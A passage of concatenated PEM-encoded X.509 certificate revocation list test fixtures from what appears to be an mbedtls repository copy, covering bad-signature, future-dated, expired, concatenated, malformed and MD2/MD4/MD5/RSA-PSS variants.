IENBggkAwUPifmJDzOgwCgYIKoZIzj0EAwQDaQAwZgIxAL/VFrDIYUECsS0rVpAy 8 | 6zt/CqeAZ1sa/l5LTaG1XW286n2Kibipr6EpkYZNYIQILgIxAI0wb3Py1DHPWpYf 9 | /BFBH7C3KYq+nWTrLeEnhrjU1LzG/CiQ8lnuskya6lw/P3lJ/A== 10 | -----END X509 CRL----- 11 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-future.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBgzCCAQoCAQEwCQYHKoZIzj0EATA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EXDTMyMDMxMDEx 4 | MDUxNVoXDTQyMDMwODExMDUxNVowKDASAgEKFw0xMzA5MjQxNjI4MzhaMBICARYX 5 | DTE0MDEyMDEzNDMwNVqgcjBwMG4GA1UdIwRnMGWAFJ1tICRJAT8ry3i1Gbx+JMnb 6 | +zZ8oUKkQDA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMIUG9sYXJTU0wxHDAaBgNV 7 | BAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0GCCQDBQ+J+YkPM6DAJBgcqhkjOPQQBA2gA 8 | MGUCMQCmsvNsOQdbGpmzpeZlKU9lDP6yyWenrI/89swZYogE3cSPob4tOzeYg38i 9 | or91IPgCMD7N/0Qz6Nq2IgBtZORLgsA0ltK+W6AOS+/EIhvGuXV8uguUyYknl4vb 10 | +cE+lWxhCQ== 11 | -----END X509 CRL----- 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-rsa-pss-sha1-badsign.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIICJDCCAQYCAQEwEwYJKoZIhvcNAQEKMAaiBAICAOowOzELMAkGA1UEBhMCTkwx 3 | ETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBFw0x 4 | NDAxMjAxMzQ2MzVaFw0yNDAxMTgxMzQ2MzVaMCgwEgIBChcNMTMwOTI0MTYyODM4 5 | WjASAgEWFw0xNDAxMjAxMzQzMDVaoGcwZTBjBgNVHSMEXDBagBS0WuSls97SUva5 6 | 1aaVD+s+vMf9/6E/pD0wOzELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NM 7 | MRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBggEAMBMGCSqGSIb3DQEBCjAGogQC 8 | AgDqA4IBAQB8ZBX0BEgRcx0lfk1ctELRu1AYoJ5BnsmQpq23Ca4YIP2yb2kTN1ZS 9 | 4fR4SgYcNctgo2JJiNiUkCu1ZnRUOJUy8UlEio0+aeumTNz6CbeJEDhr5NC3oiV0 10 | MzvLn9rJVLPetOT9UrvvIy8iz5Pn1d8mu5rkt9BKQRq9NQx8riKnSIoTc91NLCMo 11 | mkCCB55DVbazODSWK19e6yQ0JS454RglOsqRtLJ/EDbi6lCsLXotFt3GEGMrob1O 12 | 7Qck1Z59boaHxGYFEVnx90+4M3/qikVtwZdcBjLEmfuwYvszFw8J2y6Xwmg/HtUa 13 | y6li0JzWNHtkKUlCv2+SESZbD3NU8GQY 14 | -----END X509 CRL----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-rsa-pss-sha1.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIICJDCCAQYCAQEwEwYJKoZIhvcNAQEKMAaiBAICAOowOzELMAkGA1UEBhMCTkwx 3 | ETAPBgNVBAoTCFBvbGFyU1NMMRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBFw0x 4 | NDAxMjAxMzQ2MzVaFw0yNDAxMTgxMzQ2MzVaMCgwEgIBChcNMTMwOTI0MTYyODM4 5 | WjASAgEWFw0xNDAxMjAxMzQzMDVaoGcwZTBjBgNVHSMEXDBagBS0WuSls97SUva5 6 | 1aaVD+s+vMf9/6E/pD0wOzELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NM 7 | MRkwFwYDVQQDExBQb2xhclNTTCBUZXN0IENBggEAMBMGCSqGSIb3DQEBCjAGogQC 8 | AgDqA4IBAQB8ZBX0BEgRcx0lfk1ctELRu1AYoJ5BnsmQpq23Ca4YIP2yb2kTN1ZS 9 | 4fR4SgYcNctgo2JJiNiUkCu1ZnRUOJUy8UlEio0+aeumTNz6CbeJEDhr5NC3oiV0 10 | MzvLn9rJVLPetOT9UrvvIy8iz5Pn1d8mu5rkt9BKQRq9NQx8riKnSIoTc91NLCMo 11 | mkCCB55DVbazODSWK19e6yQ0JS454RglOsqRtLJ/EDbi6lCsLXotFt3GEGMrob1O 12 | 7Qck1Z59boaHxGYFEVnx90+4M3/qikVtwZdcBjLEmfuwYvszFw8J2y6Xwmg/HtUa 13 | y6li0JzWNHtkKUlCv2+SESZbD3NU8GQZ 14 | -----END X509 CRL----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-rsa-pss-sha224.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIICejCCATECAQEwPgYJKoZIhvcNAQEKMDGgDTALBglghkgBZQMEAgShGjAYBgkq 3 | hkiG9w0BAQgwCwYJYIZIAWUDBAIEogQCAgDiMDsxCzAJBgNVBAYTAk5MMREwDwYD 4 | VQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wgVGVzdCBDQRcNMTQwMTIw 5 | MTM1NjA2WhcNMjQwMTE4MTM1NjA2WjAoMBICAQoXDTEzMDkyNDE2MjgzOFowEgIB 6 | FhcNMTQwMTIwMTM0MzA1WqBnMGUwYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/r 7 | PrzH/f+hP6Q9MDsxCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcG 8 | A1UEAxMQUG9sYXJTU0wgVGVzdCBDQYIBADA+BgkqhkiG9w0BAQowMaANMAsGCWCG 9 | SAFlAwQCBKEaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAgSiBAICAOIDggEBAEJI 10 | i9sQOzMvvOTksN48+X+kk/wkLMKRGI222lqU6y6tP1LX3OE/+KN8gPXR+lCC+e0v 11 | TsRTJkpKEcmHZoP/8kOtZnLb9PdITKGMQnZ+dmn5MFEzZI/zyrYWuJTuK1Q83w0e 12 | Mc88cAhu8i4PTk/WnsWDphK1Q2YRupmmwWSUpp1Z2rpR+YSCedC01TVrtSUJUBw9 13 | NSqKDhyWYJIbS6/bFaERswC8xlMRhyLHUvikjmAK36TbIdhTnEffHOPW75sEOEEB 14 | f0A3VtlZ7y5yt2/a6vOauJCivxKt/PutdHfBqH43QQmoVLWC2FmT9ADTJwcsZB3D 15 | a6JSqCIMRCQY2JOUn0A= 16 | -----END X509 CRL----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-rsa-pss-sha256.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIICejCCATECAQEwPgYJKoZIhvcNAQEKMDGgDTALBglghkgBZQMEAgGhGjAYBgkq 3 | hkiG9w0BAQgwCwYJYIZIAWUDBAIBogQCAgDeMDsxCzAJBgNVBAYTAk5MMREwDwYD 4 | VQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wgVGVzdCBDQRcNMTQwMTIw 5 | MTM1NjE2WhcNMjQwMTE4MTM1NjE2WjAoMBICAQoXDTEzMDkyNDE2MjgzOFowEgIB 6 | FhcNMTQwMTIwMTM0MzA1WqBnMGUwYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/r 7 | PrzH/f+hP6Q9MDsxCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcG 8 | A1UEAxMQUG9sYXJTU0wgVGVzdCBDQYIBADA+BgkqhkiG9w0BAQowMaANMAsGCWCG 9 | SAFlAwQCAaEaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAgGiBAICAN4DggEBAEZ4 10 | oqp9i5eXrN6aCSTaU1j07MVTFW/U1jQAq6GseB6bEvoEXFMUHJsgAObqCK9flfEC 11 | FEqXqWSo33hhPU7AKKttbDLjUYRNnQAPRUnRIl1/a1+UjqgKchWWD9ityeW8ICxo 12 | IdATX9reYmPDLIMqTC7zuflYkvrvdEOuBORQP5mn4j8t84MSQF/p4qzaU0XxLo4X 13 | ckzZCcHpa45AApCDjJMd9onhFVCYsykiYrF9NQFO8TI4lQ5jv79GoufEzvhY1SPB 14 | r1xz4sMpfyaoPaa3SM2/nD65E5jzXell2u2VWNGKv4zAQP0E5yGel+1rklBltadb 15 | XLdJyyak33CLBKu+nJc= 16 | -----END X509 CRL----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-rsa-pss-sha384.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIICejCCATECAQEwPgYJKoZIhvcNAQEKMDGgDTALBglghkgBZQMEAgKhGjAYBgkq 3 | hkiG9w0BAQgwCwYJYIZIAWUDBAICogQCAgDOMDsxCzAJBgNVBAYTAk5MMREwDwYD 4 | VQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wgVGVzdCBDQRcNMTQwMTIw 5 | MTM1NjI4WhcNMjQwMTE4MTM1NjI4WjAoMBICAQoXDTEzMDkyNDE2MjgzOFowEgIB 6 | FhcNMTQwMTIwMTM0MzA1WqBnMGUwYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/r 7 | PrzH/f+hP6Q9MDsxCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcG 8 | A1UEAxMQUG9sYXJTU0wgVGVzdCBDQYIBADA+BgkqhkiG9w0BAQowMaANMAsGCWCG 9 | SAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAgKiBAICAM4DggEBAAco 10 | SntUGDLBOAu0IIZaVea5Nt1NMsMcppC0hWPuH1LKAwyUODBqpT+0+AuALK0eIdYR 11 | a7mAB+cv2fFwmwxnQWJ1Fvx4ft/N2AAfB83VRKpSo3xR8bxloHfTWKmyxJHmH9j1 12 | EYmLS86rj3Nhjf4m/YlQQ3Im5HwOgSgBOE8glq5D+0Wmsi9LsNEZXEzMw7TMUgbs 13 | y9o/ghYF/shKU4mewK3DeM9gQiTcH5A4ISXR87hBQ08AKJRAG1CLvTyzqWiUUY+k 14 | q8iZDYF17sHrPi2yn8q9c4zdxiaWDGDdL0Lh90wXGTAageoGEq25TMuL5FpX+u1u 15 | KUH/xf1jEnNzbYNGiZw= 16 | -----END X509 CRL----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl-rsa-pss-sha512.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIICejCCATECAQEwPgYJKoZIhvcNAQEKMDGgDTALBglghkgBZQMEAgOhGjAYBgkq 3 | hkiG9w0BAQgwCwYJYIZIAWUDBAIDogQCAgC+MDsxCzAJBgNVBAYTAk5MMREwDwYD 4 | VQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wgVGVzdCBDQRcNMTQwMTIw 5 | MTM1NjM4WhcNMjQwMTE4MTM1NjM4WjAoMBICAQoXDTEzMDkyNDE2MjgzOFowEgIB 6 | FhcNMTQwMTIwMTM0MzA1WqBnMGUwYwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/r 7 | PrzH/f+hP6Q9MDsxCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcG 8 | A1UEAxMQUG9sYXJTU0wgVGVzdCBDQYIBADA+BgkqhkiG9w0BAQowMaANMAsGCWCG 9 | SAFlAwQCA6EaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAgOiBAICAL4DggEBAB9F 10 | ywBfxOjetxNbCFhOYoPY2jvFCFVdlowMGuxEhX/LktqiBXqRc2r5naQSzuHqO8Iq 11 | 1zACtiDLri0CvgSHlravBNeY4c2wj//ueFE89tY5pK9E6vZp7cV+RfMx2YfGPAA2 12 | t7tWZ2rJWzELg8cZ8hpjSwFH7JmgJzjE5gi2gADhBYO6Vv5S3SOgqNjiN1OM31AU 13 | p6GHK5Y1jurF5Zwzs+w3wXoXgpOxxwEC4eiS86c9kNSudwTLvDTU0bYEQE1cF+K0 14 | sB8QWABFJfuO5kjD2w3rWgmAiOKsZoxd1xrda+WD3JhDXnoVq3oVBIVlWVz6YID8 15 | enMfMvwScA5AImzu9xA= 16 | -----END X509 CRL----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIyMDEwMjI1 4 | OVoXDTE5MTEyNTEwMjI1OVowKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEFBQADggEBAJYuWdKPdblMVWCnxpMnchuL 6 | dqWzK2BA0RelCaGjpxuwX3NmLDm+5hKja/DJxaRqTOf4RSC3kcX8CdIldsLO96dz 7 | //wAQdFPDhy6AFT5vKTO8ItPHDb7qFOqFqpeJi5XN1yoZGTB1ei0mgD3xBaKbp6U 8 | yCOZJSIFomt7piT4GcgWVHLUmpyHDDeodNhYPrN0jf2mr+ECd9fQJYdz1qm0Xx+Q 9 | NbKXDiPRmPX0qVleCZSeSp1JAmU4GoCO+96qQUpjgll+6xWya3UNj61f9sh0Zzr7 10 | 5ug2LZo5uBM/LpNR1K3TLxNCcg7uUPTn9r143d7ivJhPl3tEJn4PXjv6mlLoOgU= 11 | -----END X509 CRL----- 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_cat_ec-rsa.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBcTCB9wIBATAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EXDTEzMDkyNDE2 4 | MzEwOFoXDTIzMDkyMjE2MzEwOFowFDASAgEKFw0xMzA5MjQxNjI4MzhaoHIwcDBu 5 | BgNVHSMEZzBlgBSdbSAkSQE/K8t4tRm8fiTJ2/s2fKFCpEAwPjELMAkGA1UEBhMC 6 | TkwxETAPBgNVBAoTCFBvbGFyU1NMMRwwGgYDVQQDExNQb2xhcnNzbCBUZXN0IEVD 7 | IENBggkAwUPifmJDzOgwCgYIKoZIzj0EAwIDaQAwZgIxAKuQ684s7gyhtxKJr6Ln 8 | S2BQ02f1jjPHrZVdXaZvm3C5tGi2cKkoK1aMiyC3LsRCuAIxAIMhj0TmcuIZr5fX 9 | g5RByD7zUnZBpoEAdgxFy4JPJ2IViWOPekSGh8b/JY1VNS6Zbw== 10 | -----END X509 CRL----- 11 | -----BEGIN X509 CRL----- 12 | MIIBqzCBlDANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 13 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIyMDEwMjI1 14 | OVoXDTE5MTEyNTEwMjI1OVowKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 15 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEFBQADggEBAJYuWdKPdblMVWCnxpMnchuL 16 | dqWzK2BA0RelCaGjpxuwX3NmLDm+5hKja/DJxaRqTOf4RSC3kcX8CdIldsLO96dz 17 | //wAQdFPDhy6AFT5vKTO8ItPHDb7qFOqFqpeJi5XN1yoZGTB1ei0mgD3xBaKbp6U 18 | yCOZJSIFomt7piT4GcgWVHLUmpyHDDeodNhYPrN0jf2mr+ECd9fQJYdz1qm0Xx+Q 19 | NbKXDiPRmPX0qVleCZSeSp1JAmU4GoCO+96qQUpjgll+6xWya3UNj61f9sh0Zzr7 20 | 5ug2LZo5uBM/LpNR1K3TLxNCcg7uUPTn9r143d7ivJhPl3tEJn4PXjv6mlLoOgU= 21 | -----END X509 CRL----- 22 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_cat_ecfut-rsa.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBgzCCAQoCAQEwCQYHKoZIzj0EATA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EXDTMyMDMxMDEx 4 | MDUxNVoXDTQyMDMwODExMDUxNVowKDASAgEKFw0xMzA5MjQxNjI4MzhaMBICARYX 5 | DTE0MDEyMDEzNDMwNVqgcjBwMG4GA1UdIwRnMGWAFJ1tICRJAT8ry3i1Gbx+JMnb 6 | +zZ8oUKkQDA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMIUG9sYXJTU0wxHDAaBgNV 7 | BAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0GCCQDBQ+J+YkPM6DAJBgcqhkjOPQQBA2gA 8 | MGUCMQCmsvNsOQdbGpmzpeZlKU9lDP6yyWenrI/89swZYogE3cSPob4tOzeYg38i 9 | or91IPgCMD7N/0Qz6Nq2IgBtZORLgsA0ltK+W6AOS+/EIhvGuXV8uguUyYknl4vb 10 | +cE+lWxhCQ== 11 | -----END X509 CRL----- 12 | -----BEGIN X509 CRL----- 13 | MIIBqzCBlDANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 14 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIyMDEwMjI1 15 | OVoXDTE5MTEyNTEwMjI1OVowKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 16 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEFBQADggEBAJYuWdKPdblMVWCnxpMnchuL 17 | dqWzK2BA0RelCaGjpxuwX3NmLDm+5hKja/DJxaRqTOf4RSC3kcX8CdIldsLO96dz 18 | //wAQdFPDhy6AFT5vKTO8ItPHDb7qFOqFqpeJi5XN1yoZGTB1ei0mgD3xBaKbp6U 19 | yCOZJSIFomt7piT4GcgWVHLUmpyHDDeodNhYPrN0jf2mr+ECd9fQJYdz1qm0Xx+Q 20 | NbKXDiPRmPX0qVleCZSeSp1JAmU4GoCO+96qQUpjgll+6xWya3UNj61f9sh0Zzr7 21 | 5ug2LZo5uBM/LpNR1K3TLxNCcg7uUPTn9r143d7ivJhPl3tEJn4PXjv6mlLoOgU= 22 | -----END X509 CRL----- 23 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_cat_rsa-ec.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIyMDEwMjI1 4 | OVoXDTE5MTEyNTEwMjI1OVowKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEFBQADggEBAJYuWdKPdblMVWCnxpMnchuL 6 | dqWzK2BA0RelCaGjpxuwX3NmLDm+5hKja/DJxaRqTOf4RSC3kcX8CdIldsLO96dz 7 | //wAQdFPDhy6AFT5vKTO8ItPHDb7qFOqFqpeJi5XN1yoZGTB1ei0mgD3xBaKbp6U 8 | yCOZJSIFomt7piT4GcgWVHLUmpyHDDeodNhYPrN0jf2mr+ECd9fQJYdz1qm0Xx+Q 9 | NbKXDiPRmPX0qVleCZSeSp1JAmU4GoCO+96qQUpjgll+6xWya3UNj61f9sh0Zzr7 10 | 5ug2LZo5uBM/LpNR1K3TLxNCcg7uUPTn9r143d7ivJhPl3tEJn4PXjv6mlLoOgU= 11 | -----END X509 CRL----- 12 | -----BEGIN X509 CRL----- 13 | MIIBcTCB9wIBATAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 14 | UG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EXDTEzMDkyNDE2 15 | MzEwOFoXDTIzMDkyMjE2MzEwOFowFDASAgEKFw0xMzA5MjQxNjI4MzhaoHIwcDBu 16 | BgNVHSMEZzBlgBSdbSAkSQE/K8t4tRm8fiTJ2/s2fKFCpEAwPjELMAkGA1UEBhMC 17 | TkwxETAPBgNVBAoTCFBvbGFyU1NMMRwwGgYDVQQDExNQb2xhcnNzbCBUZXN0IEVD 18 | IENBggkAwUPifmJDzOgwCgYIKoZIzj0EAwIDaQAwZgIxAKuQ684s7gyhtxKJr6Ln 19 | S2BQ02f1jjPHrZVdXaZvm3C5tGi2cKkoK1aMiyC3LsRCuAIxAIMhj0TmcuIZr5fX 20 | g5RByD7zUnZBpoEAdgxFy4JPJ2IViWOPekSGh8b/JY1VNS6Zbw== 21 | -----END X509 CRL----- 22 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_cat_rsabadpem-ec.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIyMDEwMjI1 4 | OVoXDTE5MTEyNTEwMjI1OVowKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEFBQADggEBAJYuWdKPdblMVWCnxpMnchuL 6 | dqWzK2BA0RelCaGjpxuwX3NmLDm+5hKja/DJxaRqTOf4RSC3kcX8CdIldsLO96dz 7 | //wAQdFPDhy6AFT5vKTO8ItPHDb7qFOqFqpeJi5XN1yoZGTB1ei0mgD3xBaKbp6U 8 | yCOZJSIFomt7piT4GcgWVHLUmpyHDDeodNhYPrN0jf2mr+ECd9fQJYdz1qm0Xx+Q 9 | NbKXDiPRmPX0qVleCZSeSp1JAmU4GoCO+96qQUpjgll+6xWya3UNj61f9sh0Zzr7 10 | 5ug2LZo5uBM/LpNR1K3TLxNCcg7uUPTn9r143d7ivJhPl3tEJn4PXjv6mlLoOgU 11 | -----END X509 CRL----- 12 | -----BEGIN X509 CRL----- 13 | MIIBcTCB9wIBATAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 14 | UG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EXDTEzMDkyNDE2 15 | MzEwOFoXDTIzMDkyMjE2MzEwOFowFDASAgEKFw0xMzA5MjQxNjI4MzhaoHIwcDBu 16 | BgNVHSMEZzBlgBSdbSAkSQE/K8t4tRm8fiTJ2/s2fKFCpEAwPjELMAkGA1UEBhMC 17 | TkwxETAPBgNVBAoTCFBvbGFyU1NMMRwwGgYDVQQDExNQb2xhcnNzbCBUZXN0IEVD 18 | IENBggkAwUPifmJDzOgwCgYIKoZIzj0EAwIDaQAwZgIxAKuQ684s7gyhtxKJr6Ln 19 | S2BQ02f1jjPHrZVdXaZvm3C5tGi2cKkoK1aMiyC3LsRCuAIxAIMhj0TmcuIZr5fX 20 | g5RByD7zUnZBpoEAdgxFy4JPJ2IViWOPekSGh8b/JY1VNS6Zbw== 21 | -----END X509 CRL----- 22 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_expired.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIyMDEwMjQx 4 | OVoXDTExMDIyMDExMjQxOVowKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEFBQADggEBAKgP1XmCIPbfY1/UO+SVFQir 6 | jArZ94QnQdoan4tJ29d8DmTxJ+z9/KyWNoGeOwc9P/2GQQaZahQOBr0f6lYd67Ct 7 | wFVh/Q2zF8FgRcrQV7u/vJM33Q2yEsQkMGlM7rE5lC972vUKWu/NKq8bN9W/tWxZ 8 | SFbvTXpv024aI0IRudpOCALnIy8SFhVb2/52IN2uR6qrFizDexMEdSckgpHuJzGS 9 | IiANhIMn5LdQYJFjPgBzQU12tDdgzcpxtGhT10y4uQre+UbSjw+iVyml3issw59k 10 | OSmkWFb06LamRC215JAMok3YQO5RnxCR8EjqPcJr+7+O9a1O1++yiaitg4bUjEA= 11 | -----END X509 CRL----- 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_md2.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQIFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTA5MDcxOTE5NTYz 4 | N1oXDTA5MDkxNzE5NTYzN1owKDASAgEBFw0wOTAyMDkyMTEyMzZaMBICAQMXDTA5 5 | MDIwOTIxMTIzNlowDQYJKoZIhvcNAQECBQADggEBAF8F5y82zgtxcwQ4aFvrkanT 6 | ygyd5+RW/Y//vpck44V+CYx1d1r+QkauaXel9qUKBPsg2dUwQ+jwV/m+Sp2MHaX5 7 | NfW7XUb7Ji4yhwgh9/9vFPqqnKBf9esLJuJoQ4mLhcGB5J1yCcavLrynvB4PJEnG 8 | graTbbyizelXBmk3ApvNYxczJZxt7EzpVbrFaev7myGmOffdDkIMc2WDpDkyLTlU 9 | kITjB7fMJhD/dgNskKZ4fgkKKKPCMJrJPO67Wzwqx/6vsrZcACB9X+143WZr4GVO 10 | Fw2SaMnqfVLlUEndoOpbLCU4ugcc82kQQF3TsovXJYW7XqoWl2u/ENCwShl9rl4= 11 | -----END X509 CRL----- 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_md4.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQMFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIxMjE0NDQw 4 | N1oXDTExMDQxMzE0NDQwN1owKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEDBQADggEBAIJtYXy3uwIpmSGfi9muS8xv 6 | 36FT6g3s1V/xicdPa54juJgBI6sxHKzQtbSNIbqadEWwUtvQ8k1EMRo9UGObhRV8 7 | i+UWm5qi0GFV7nMi4E2p2Ji/sFKtgdxkzhCfn+p3MoGgx/nC7YtwpnNdF+kuCV1M 8 | JTPqfm+taZkYADOafP/hRaPx3TI+HNE3ux4Cb7hNpWdfWzt48ZPMuhCMzItLd/UK 9 | xxjJam9XAGUTKi7+eWtma9XzmYOIElQv2KFPVMcx5nvg039rrWK6tObGL67kCfTH 10 | v+nIx7rAOW6UNU8aj1kfJHYjEKMBH1I9wjMSHUpkxBLQOKlPNRksiEVsIhmEVss= 11 | -----END X509 CRL----- 12 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/crl_md5.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN X509 CRL----- 2 | MIIBqzCBlDANBgkqhkiG9w0BAQQFADA7MQswCQYDVQQGEwJOTDERMA8GA1UEChMI 3 | UG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EXDTExMDIxMjE0NDQw 4 | N1oXDTExMDQxMzE0NDQwN1owKDASAgEBFw0xMTAyMTIxNDQ0MDdaMBICAQMXDTEx 5 | MDIxMjE0NDQwN1owDQYJKoZIhvcNAQEEBQADggEBAKKCJZ1MwL+gKAw3RV4qEmb9 6 | gMDdSLJ1Vdkn9FgDx2ijNnYDtvaW+I3sOXrq7O6gVN1KEamJJbufVJA5+OE2oVbC 7 | husEdgQm8D5TbrGcjPIPWxgYyuuRsl7XovZhXnqTIUrC+J8oH9XzKaMc+HZb5UhR 8 | h8bzcyp+9jbBje7lWwKTzkuvd/I7VbS02TUkWFJTrYB0Laj8WMcgcZiyX0iZuj8j 9 | 4hOupu0lPoSzZ4h7t0Vmay6wO+8n8LJohyiwYS7LddpOjIdP0MWifN7u/ArqNNlh 10 | 2kg8eAc1pYOU/pJFTAAbOmC/kQpa9skd+PPIPPh9T53o3yeDQA0vFqN92JryCCU= 11 | -----END X509 CRL----- 12 | -------------------------------------------------------------------------------- 